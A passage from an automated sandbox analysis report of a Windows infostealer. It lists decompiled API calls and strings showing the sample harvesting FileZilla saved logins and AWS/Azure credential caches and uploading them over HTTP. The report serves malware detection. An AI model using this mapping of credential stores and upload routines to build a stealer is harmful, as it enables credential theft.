Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

strtok_s.MSVCRT ref: 0041047B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
lstrlenA.KERNEL32(00000000), ref: 004104F3

Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
lstrlenA.KERNEL32(00000000), ref: 0041053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
lstrlenA.KERNEL32(00000000), ref: 00410587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
lstrlenA.KERNEL32(00000000), ref: 004105D5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
strtok_s.MSVCRT ref: 004107D9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
memset.MSVCRT ref: 0041083D

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00410404
browser: FileZilla, xrefs: 004106B9
<User>, xrefs: 00410570
<Port>, xrefs: 00410526
profile: null, xrefs: 004106C8
login: , xrefs: 0041072A
<Pass encoding="base64">, xrefs: 004105BA
password: , xrefs: 0041075B
url: , xrefs: 004106D7
<Host>, xrefs: 004104DC

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: bb3d1612d92409f956a060fe6b614f4c28f78b7a9e98f3b086c1bf9aff7a9748
Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
Opcode Fuzzy Hash: bb3d1612d92409f956a060fe6b614f4c28f78b7a9e98f3b086c1bf9aff7a9748
Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,0096CC00), ref: 00419BF1
GetProcAddress.KERNEL32(74DD0000,0096CAB0), ref: 00419C0A
GetProcAddress.KERNEL32(74DD0000,0096C918), ref: 00419C22
GetProcAddress.KERNEL32(74DD0000,0096CB70), ref: 00419C3A
GetProcAddress.KERNEL32(74DD0000,0096CB28), ref: 00419C53
GetProcAddress.KERNEL32(74DD0000,00967280), ref: 00419C6B
GetProcAddress.KERNEL32(74DD0000,00966930), ref: 00419C83
GetProcAddress.KERNEL32(74DD0000,00966630), ref: 00419C9C
GetProcAddress.KERNEL32(74DD0000,0096C948), ref: 00419CB4
GetProcAddress.KERNEL32(74DD0000,0096CBA0), ref: 00419CCC
GetProcAddress.KERNEL32(74DD0000,0096CAC8), ref: 00419CE5
GetProcAddress.KERNEL32(74DD0000,0096CAE0), ref: 00419CFD
GetProcAddress.KERNEL32(74DD0000,00966950), ref: 00419D15
GetProcAddress.KERNEL32(74DD0000,0096CB10), ref: 00419D2E
GetProcAddress.KERNEL32(74DD0000,0096C930), ref: 00419D46
GetProcAddress.KERNEL32(74DD0000,009665D0), ref: 00419D5E
GetProcAddress.KERNEL32(74DD0000,0096CBB8), ref: 00419D77
GetProcAddress.KERNEL32(74DD0000,0096C990), ref: 00419D8F
GetProcAddress.KERNEL32(74DD0000,00966790), ref: 00419DA7
GetProcAddress.KERNEL32(74DD0000,0096CBE8), ref: 00419DC0
GetProcAddress.KERNEL32(74DD0000,00966970), ref: 00419DD8
LoadLibraryA.KERNEL32(0096C960,?,00416CA0), ref: 00419DEA
LoadLibraryA.KERNEL32(0096C9A8,?,00416CA0), ref: 00419DFB
LoadLibraryA.KERNEL32(0096C9D8,?,00416CA0), ref: 00419E0D
LoadLibraryA.KERNEL32(0096C9F0,?,00416CA0), ref: 00419E1F
LoadLibraryA.KERNEL32(0096CA08,?,00416CA0), ref: 00419E30
GetProcAddress.KERNEL32(75A70000,0096CB58), ref: 00419E52
GetProcAddress.KERNEL32(75290000,0096CA20), ref: 00419E73
GetProcAddress.KERNEL32(75290000,0096CA38), ref: 00419E8B
GetProcAddress.KERNEL32(75BD0000,0096CA50), ref: 00419EAD
GetProcAddress.KERNEL32(75450000,00966850), ref: 00419ECE
GetProcAddress.KERNEL32(76E90000,00967290), ref: 00419EEF
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06

Strings

NtQueryInformationProcess, xrefs: 00419EFA

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,00976668), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,009766B8,00000000,?,0096DF88,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT(?), ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT(?), ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

", xrefs: 00405756
", xrefs: 004054D2
------, xrefs: 0040568B
", xrefs: 00405614
------, xrefs: 00405407
------, xrefs: 00405549
------, xrefs: 004052E7
--, xrefs: 004052D0

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: 2f870b1aa2c38778c0b2feba81dc8c59410f3a3f9b8e31f0f0ae42b138d9d8d1
Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
Opcode Fuzzy Hash: 2f870b1aa2c38778c0b2feba81dc8c59410f3a3f9b8e31f0f0ae42b138d9d8d1
Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,00976668), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00976688,00000000,?,0096DF88,00000000,?,00421B4C), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT(?), ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

------, xrefs: 00405AE6
S`A, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
S`A, xrefs: 004060CA
------, xrefs: 00405D9C
", xrefs: 00405E66
------, xrefs: 00405C5B
", xrefs: 00405D25

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$S`A$S`A
API String ID: 1406981993-1449208648
Opcode ID: 78b8d42d9890a36bb6abe959c91fada7cc87df2669e916b17644556e69dc78b8
Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
Opcode Fuzzy Hash: 78b8d42d9890a36bb6abe959c91fada7cc87df2669e916b17644556e69dc78b8
Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00414FD7

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00415000
lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

memset.MSVCRT ref: 00415063
lstrcatA.KERNEL32(?,00000000), ref: 0041508C
lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

memset.MSVCRT ref: 004150EF
lstrcatA.KERNEL32(?,00000000), ref: 00415118
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0096C4E8,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

memset.MSVCRT ref: 0041517B

Strings

\.IdentityService\, xrefs: 00415129
Azure\.aws, xrefs: 004150AF
Azure\.azure, xrefs: 00415023
\.aws\, xrefs: 0041509D
msal.cache, xrefs: 00415140
*.*, xrefs: 004150B4
*.*, xrefs: 00415028
Azure\.IdentityService, xrefs: 0041513B
\.azure\, xrefs: 00415011

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: 24077a36fa7f570b9d902fd8354d2c486b68e20ae80709ed5a200977a84efc1f
Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
Opcode Fuzzy Hash: 24077a36fa7f570b9d902fd8354d2c486b68e20ae80709ed5a200977a84efc1f
Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
StrCmpCA.SHLWAPI(?,00976668), ref: 0040498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,00976618), ref: 00404E38
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
InternetCloseHandle.WININET(00000000), ref: 00404EFD
InternetCloseHandle.WININET(00000000), ref: 00404F15
HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

------, xrefs: 00404CB9
", xrefs: 00404D83
", xrefs: 00404C42
------, xrefs: 00404B78
------, xrefs: 00404A0D

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
